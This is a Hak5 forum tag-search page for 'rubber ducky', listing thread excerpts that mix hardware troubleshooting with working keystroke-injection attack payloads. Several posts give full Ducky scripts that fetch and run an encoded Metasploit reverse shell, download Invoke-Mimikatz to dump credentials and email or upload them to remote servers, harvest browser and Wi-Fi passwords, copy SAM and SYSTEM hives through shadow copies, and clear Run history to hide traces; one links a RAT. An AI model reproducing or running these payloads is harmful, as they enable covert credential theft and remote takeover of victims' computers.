Jump to content
Hak5 Forums

Search the Community

Showing results for tags 'rubber ducky'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • WiFi Pineapple
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapple University
    • WiFi Pineapples Mark I, II, III
  • Hak5 Gear
    • Bash Bunny
    • Packet Squirrel
    • LAN Turtle
    • USB Rubber Ducky
  • Hak5 Shows
    • Hak5
    • HakTip
    • Metasploit Minute
    • Threatwire
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Found 40 results

  1. Hello peeps! So i was thinking yesterday, cant we skip all that long-taking payload typing to get a reverse shell? Here is where i thought of pastebin and wget to bat! It's really simple and just an upgrade. DELAY 500 GUI R DELAY 500 STRING powershell ENTER DELAY 1500 LEFTARROW DELAY 100 ENTER DELAY 2000 ALT TAB DELAY 100 STRING cd %temp% ENTER STRING <the pastebin raw> -UseBasicParsing -OutFile pay.bat ENTER DELAY 100 STRING ./pay.bat ENTER The pastebin raw would look like this powershell -nop -wind hidden -noni -enc <your encoded metasploit payload> NP. -BrianNovius
  2. Meterpreter over WAN(need help)

    I have been trying to get a meterpreter session over WAN using a reverse tcp attack for a while now and i'm pretty stuck. My attack works fine on LAN and I have port forwarding set up to sent the session to my listener on port 4444. I can get a netcat session over WAN so i know the port forwarding is set up correctly but meterpreter doesn't seem to be receiving any connections. Any thoughts?
  3. SSID Names and Passwords

    I posted this in a seperate HAK5 forum room. How do you think is the best way to deploy this code? I tested it on a Windows 10 machine. It writes all SSID and Credentials to a temp file, then emails it to the attacker.
  4. hi guys i've a big proble, in the last weeks i won a usb rubber ducky during an hackathon but the replay buttons seems broken. When i press it the rubber ducky doesn't replay the script, what could be the problem?
  5. USB Rubber Ducky ISSUE

    Hi guys, I just bought the rubber ducky and flashed it to the Twin Duck mode. Well the twin duck mode is working pretty much cool infact iam able to browse through files in my SD card and the one which comes with the ducky is also executing a Hello World Payload but when I make my own payload and put the inject.bin file the ducky doesnt show up rather it just show a red light for about a second and then theres no light neither the payload works. Ive tried to swap SD cards but that does'nt solve my problem either?
  6. User browser Details

    Hi Guys I am trying to get the PHP working on my Apache install that is detailed here: https://www.hak5.org/gear/duck/what-is-the-best-security-awareness-payload-for-the-usb-rubber-ducky I am looking to get IP and browser details as described. My Apache logs are saying the error is: PHP Parse error: Does anyone have a clue where on this line the error is? I am no PHP guy :) Any help is appreciated. Thanks Phil
  7. Hak5 artwork

    https://instagram.com/p/BatFZAIA8Pk/ Anyone know where I can find the Packet Squirrel and Ducky version?
  8. Rubber Ducky Ship Issue

    I recently ordered a Usb rubber ducky and payed through the DSL Delivery Option I need it for my school project may i know how much does it takes to the ducky to be on ur doorsteps
  9. Hak5 diagram icons

    I know this may be seen as a very pointless and stupid question. Does the Hak5 team provide a set of the icons they use for the various diagrams they publish? E.g https://www.hak5.org/wp-content/uploads/2017/10/openvpn_diagram1.png Although not essential it would be good to be able to produce diagrams while learning, using the same theme as used by Hak5. Must admit I really like the simplistic look of them.
  10. Exfiltration. Steal files.

    Hey guys.. Can someone help me out with this cmdlet error ? I've flashed my duck with no probs.. No spelling error from the scripts. When i keyed this manually with win+r key... STRING powershell ".((gwmi win32_volume -f 'label=''_''').Name+'d.cmd')" It created a folder inside of slurp but with no files exfiltrated.. And whenever i tried to run the inject with twin duck(1).. I got this error popped out instead. Did i missed something here ? Thank you.
  11. I have created an one second ducky payload its stupid simple use browser auto pwn by meatspolit to get a shell on any box but you can also use a beef hook I cant afford your tools so that is why it theoretical. Some please try it probably wont work but it a good concept. run "your website" enter enter alt f4
  12. Bluetooth Rubber Ducky

    Hi guys, I've been playing around trying to create a Bluetooth version of Rubber Ducky working. Not sure how useful that would be, but I'm in the very early stages. Have been experimenting with this beauty: BBC micro:bit Most 11/12 year olds in the UK will have received one of these in school last year. The BBC ran a programme that allowed schools to apply for free micro:bits for all of Year 7 (6th grade). There's a friendly online interface to program them in Python, but you can actually compile C++ for these badboys. They're available for under £15 / $18: http://microbit.org/resellers/, hence making good little gadgets to mess around with for a BT Rubber Ducky. The micro:bit has a few pins available, a USB port, a small bluetooth antenna, it's very small and can be battery powered (or USB powered). On the front there are 15 LED lights and two buttons to play with: You can program the micro:bit to connect via Bluetooth, with little security (no PIN or anything). Then you can use the two buttons to send commands to the computer or smartphone. At the moment, I'm only able to send ASCII commands, so I've been mapping out the special commands in an ASCII/latin table. I haven't yet figured out how to use the Windows key, but I have managed to take a screenshot ("\x8C") and save a file with the name pwned ("\x99,s,pwned,\n"). Sample file available here, just drag and drop it onto your micro:bit, connect to 'ducky' via BT, the left button will take screenshots, the right button will save files. Code is available here, hopefully others will be able to assist with this experiment :).
  13. Ducky NirCMD bin file creation

    Hey All, I am trying to create a bin file with some nircmd commands and I keep getting errors on it. Can anyone advise me on how I am being an idiot. Thanks NW
  14. A question about scripting

    I am trying to add a twist on the 15 second password stealer i robot hack in which it emails the credentials instead of uploading them to a server. This is my code. I changed the email addresses and passwords for security. DELAY 3000 REM Open an admin command prompt GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 2000 ALT y DELAY 1000 REM Obfuscate the command prompt STRING mode con:cols=18 lines=1 ENTER STRING color FE ENTER REM Download and execute Invoke Mimikatz then upload the results STRING powershell "IEX (New-Object Net.WebClient).DownloadString('http://darren.kitchen/im.ps1');$output = Invoke-Mimikatz -DumpCreds; $output > log.txt;" ENTER DELAY 1500 STRING powershell ENTER STRING $SMTPServer = 'smtp.gmail.com' ENTER STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) ENTER STRING $SMTPInfo.EnableSsl = $true ENTER STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('MyEmail1@gmail.com', 'MyPassword') ENTER STRING $ReportEmail = New-Object System.Net.Mail.MailMessage ENTER STRING $ReportEmail.From = 'MyEmail1@gmail.com' ENTER STRING $ReportEmail.To.Add('MyEmail2@gmail.com') ENTER STRING $ReportEmail.Subject = 'PassDump' ENTER STRING $ReportEmail.Body = (Get-Content Log.txt | out-string) ENTER STRING $SMTPInfo.Send($ReportEmail) ENTER DELAY 2000 STRING exit ENTER DELAY 500 REM Clear the Run history and exit ENTER STRING exit ENTER and in my email in-box all i got was a email that said the words " How do I get it so it actually sends the output of Invoke-Mmikats instead of literally sending the words Invoke-Mimikatz. Thanks in advance.
  15. This is a modified version of MrGray's script to get passwords from a pc (Original). This version doesn't require an extra usb, but it does require a online server hosting a zip with the tools. CODE ------------------------------------------------------- REM Created by BertFast REM Gets passwords and data from pc and emails them DELAY 500 GUI d DELAY 200 GUI r DELAY 300 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 3000 LEFT ENTER DELAY 500 STRING powershell & cd %TEMP%\tools & BrowsingHistoryView.exe /stext logs\BrowsingHistoryView.txt & ChromePass.exe /stext logs\ChromePass.txt & OperaPassView.exe /stext logs\OperaPassView.txt STRING & PasswordFox.exe /stext logs\PasswordFox.txt & SkypeLogView.exe /stext logs\SkypeLogView.txt & WebBrowserPassView.exe /stext logs\WebBrowserPassView.txt & WirelessKeyView.exe /stext logs\WirelessKeyView.txt & powershell -ExecutionPolicy Bypass %TEMP%\tools\file.ps1 STRING & cd %TEMP% & del tools.zip & exit ENTER STRING Add-Type -AssemblyName System.IO.Compression.FileSystem ENTER STRING function Unzip ENTER STRING { ENTER STRING param([string]$zipfile, [string]$outpath) ENTER STRING [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath) ENTER STRING } ENTER STRING wget "http://pathtotools.zip/Tools.zip" -OutFile $ENV:temp\tools.zip ENTER STRING Unzip $ENV:temp\tools.zip $ENV:temp ENTER STRING cd $ENV:temp\tools ENTER STRING mkdir logs ENTER STRING exit ENTER Link to the tools: https://www.mediafire.com/file/ddcur1ebc3fbvb5/Tools.zip HOW TO SET IT UP ------------------------------------------------------- Download the Tools.zip file and extract it. Then, open file.ps1 with notepad or whatever program you like and changer "YourUsername" to you username (i.e bertfast) and "YourPassword" to your password. Then change "receiver" to whoever you want to send the logs to. I MADE IT WORK WITH GMAIL. I don't know if it works with other services. After that, zip the Tools folder (don't zip the files or it won't work). In the code above, change "http://pathtotools.zip/Tools.zip" to the path where you have hosted the zip file. Tested in Windows 10 x64. BIG thanks to MrGray for the original script. Also, big thanks to Nurrl. With Duckuino i converted the code above to make it work with my arduino (I don't own a rubber ducky, sorry ) Please tell me if it worked or not and the OS you are using
  16. No firmware works

    I´m using Windows 10 with Microsoft Visual C++ 2010 Redistributable, Flip (JRE_Flip_Installer_3.4.2.exe) and Atmel Driver (atmel-flip-3.4.2-signed-driver.zip). My "program.bat": @echo off rem setup console title RubberDucky Programming @echo ____________________________________________ @echo [#] RubberDucky Programming Script @echo [-] Programming File: [%1] if "%1"=="" ( goto :bail ) if not exist %1 ( goto :bail ) batchisp -device at32uc3b0256 -hardware usb -operation erase f memory flash blankcheck loadbuffer %1 program verify start reset 0 goto :done :bail @echo [!] Please provide valid input (.hex) file! :done goto :eof When I use "program.bat" with any firmware, I have the following message: Device selection....................... PASS Hardware selection..................... PASS Opening port........................... PASS Reading Bootloader version............. PASS 1.0.2 Erasing................................ PASS Selecting FLASH........................ PASS Blank checking......................... PASS 0x00000 0x3ffff Parsing HEX file....................... PASS ????????.hex WARNING: The user program and the bootloader overlap! Programming memory..................... PASS 0x00000 0x07caf Verifying memory....................... PASS 0x00000 0x07caf Starting Application................... PASS RESET 0 I tried to use with the following firmwares: c_duck_v2.hex c_duck_v2.1.hex c_duck_v2_S001.hex c_duck_v2_S002.hex Composite_Duck_S003.hex duck.hex duck_v2.hex duck_v2.1.hex m_duck.hex m_duck_v2.hex usb.hex USB_v2.hex USB_v2.1.hex Only firmwares "c_duck_v2_S002.hex" and "Composite_Duck_S003.hex" the light blink green. With the others firmwares, the light blink red. With "usb???.hex", the light don´t turn on. Even with the firmwares "c_duck_v2_S002.hex" and "Composite_Duck_S003.hex", the script does not run on either Windows 7 or Windows 10. My script (inject.bin): REM Prints: Hello World! DELAY 10000 STRING Test DELAY 5000 STRING Hello World I tried with the MicroSD card original (128MB format with FAT and FAT32) and with another MicroSD card (64MB format with FAT). Please, I need some help. Thank you.
  17. @ sign instead of "

    This is what the rubber ducky is outputting to my CMD window: Notice that @ signs have been subbed for " marks. I've tried changing the language from GB to US, but that doesn't seem to help either powershell @IEX (New-Object Net.WebClient).DownloadString('http://someplace.com/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('https://someplace.com/rx.php', $output)@ Here's the contents of the file that I pass to ducktools (python.exe ducktools.py -e -l us mimi.txt inject1.bin) to get my inject.bin file Any help would be greatly appreciated! Mimi.txt file contents: REM Title: Invoke mimikatz and send creds to remote server REM Author: Hak5Darren Props: Mubix, Clymb3r, Gentilkiwi DELAY 1000 REM Open an admin command prompt GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 2000 ALT y DELAY 1000 REM Obfuscate the command prompt REM STRING mode con:cols=18 lines=1 ENTER REM STRING color FE ENTER REM Download and execute Invoke Mimikatz then upload the results STRING powershell "IEX (New-Object Net.WebClient).DownloadString('http://someplace.com/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('https://someplace.com/rx.php', $output)" ENTER DELAY 15000 REM Clear the Run history and exit STRING powershell Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue ENTER STRING exit ENTER
  18. Modify firmware source code

    i want to modify the source code of one of the firmware of rubber ducky project, example write in a .text file inside the memory a number each time i plug the memory in a pc ... but a i am a little lost with the code somebody have experience in this, somebody have been working in this issue thanks and sorry my english i am a latinoamerican
  19. I am planning on buying the USB Rubber Ducky and I was wondering if this is possible. I was wondering if I or someone could make a payload or whatever it's called to remotely control a computer outside the network. Perhaps like VNC. Also if you could teach me how to make it WON from a different network. I would really appreciate if someone says its all possible to do with a rubber ducky alone, and also help me. THANKS!
  20. SAM File Copy - Help

    Hey everyone. I have a question. I am looking at the SAM File Grabber on a live system script and I cant seem to get it to work. I plug it in and the screen just goes crazy and then it doesnt copy anything over. Here is the script I am using. REM Modifications by overwraith ESCAPE CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 ENTER DELAY 400 REM THE NEXT LINE IS WHERE CHANGING THE DIRECTORY REM TO DESIRED DIRECTORY WOULD HAVE GONE. REM CHANGE DIRECTORY 'DUCKY' FLASH DRIVE. STRING for /f "tokens=3 delims= " %A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%A:) ENTER DELAY 800 STRING cd %DUCKYdrive% DELAY 400 STRING copy con download.vbs ENTER STRING Set args = WScript.Arguments:a = split(args(0), "/")(UBound(split(args(0),"/"))) ENTER STRING Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP"):objXMLHTTP.open "GET", args(0), false:objXMLHTTP.send() ENTER STRING If objXMLHTTP.Status = 200 Then ENTER STRING Set objADOStream = CreateObject("ADODB.Stream"):objADOStream.Open ENTER STRING objADOStream.Type = 1:objADOStream.Write objXMLHTTP.ResponseBody:objADOStream.Position = 0 ENTER STRING Set objFSO = Createobject("Scripting.FileSystemObject"):If objFSO.Fileexists(a) Then objFSO.DeleteFile a ENTER STRING objADOStream.SaveToFile a:objADOStream.Close:Set objADOStream = Nothing ENTER STRING End if:Set objXMLHTTP = Nothing:Set objFSO = Nothing ENTER CTRL z ENTER STRING cscript download.vbs http://xxxxxxxxxxxxxxx/xxx/vssown.vbs ENTER DELAY 800 STRING del download.vbs ENTER DELAY 800 STRING cscript vssown.vbs /start ENTER DELAY 800 STRING cscript vssown.vbs /create ENTER DELAY 800 STRING copy \\DUCKY\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SAM . ENTER DELAY 800 STRING copy \\DUCKY\\GLoBALROOT\Device\HarddriskVolumeShadowCopy1\windows\system32\config\SYSTEM . ENTER DELAY 800 STRING cscript vssown.vbs /stop ENTER DELAY 800 STRING del vssown.vbs ENTER STRING exit ENTER REM Make sure to change the DIRECTORY above. I changed STRING copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SAM . to STRING copy \\DUCKY\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SAM . Also the following: STRING copy \\?\\GLoBALROOT\Device\HarddriskVolumeShadowCopy1\windows\system32\config\SYSTEM . to STRING copy \\DUCKY\\GLoBALROOT\Device\HarddriskVolumeShadowCopy1\windows\system32\config\SYSTEM . Ducky is the name of the MicroSD Card so would that be correct? I changed STRING cscript download.vbs http://tools.lanmaster53.com/vssown.vbs to a vbs script provided by LanMaster53 github account. https://github.com/lanmaster53/ptscripts/blob/master/windows/vssown.vbs and changed the URL to my site hosting it. What am I missing. It doesnt seem to work or dump any files back on the Rubber Duck. I am running the Twin Duck Firmware.
  21. whenever i run a payload that has a string with the '@' symbol, it writes ' " ' instead.... any way around this???
  22. Buying Duck

    Hi hak5, I'm new here and I wanted to buy the rubber ducky but the problem is that it's not shipped in my country ( Pakistan ) so how can I get one, please help.
  23. I downloaded files from Github ,and installed "atmel flip ",but I don't know how to use this . i also saw a Video ,this showed me something about flashing on windows,but I can't understand that ,why he used cmd to flash firmare ?if I need not to install any applications,just use cmd ? thank you help me.my English is bed
  24. Usb Rubber ducky only opens cmd

    when i plug my USB rubber ducky into the USB slot and push the black button the ducky opens a command prompt and types: or /f % in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%d %myd%/duck The USB even types that if i don't have any SD card in the slot. i am running firmware c_duck_us.hex because that is the only one that actually acts like a keyboard if anyone has the factory hex i would appreciate if you send it to me thanks
  25. Hi, Hak5Forums! I'm new here and would like to post some code I wrote for the USB Rubber Ducky that allows you guys to make a RAT (Remote-Administration Tool) with the Ducky. Here is the GitHub Link: https://github.com/untitledusername/duckyRAT GitHub Wiki/Tutorial Link: https://github.com/untitledusername/duckyRAT/wiki Please note, this script doesn't allow webcam access or things of that such (I'm sure you can probably get that somehow using the command line) This script only allows you to run CMD commands on the victim's PC. If you have any questions I'll gladly answer them down below. Edit: I'm working on adding features to take screenshots of victim's desktop, webcam, etc. Thanks everybody, enjoy! - untitled ❤
×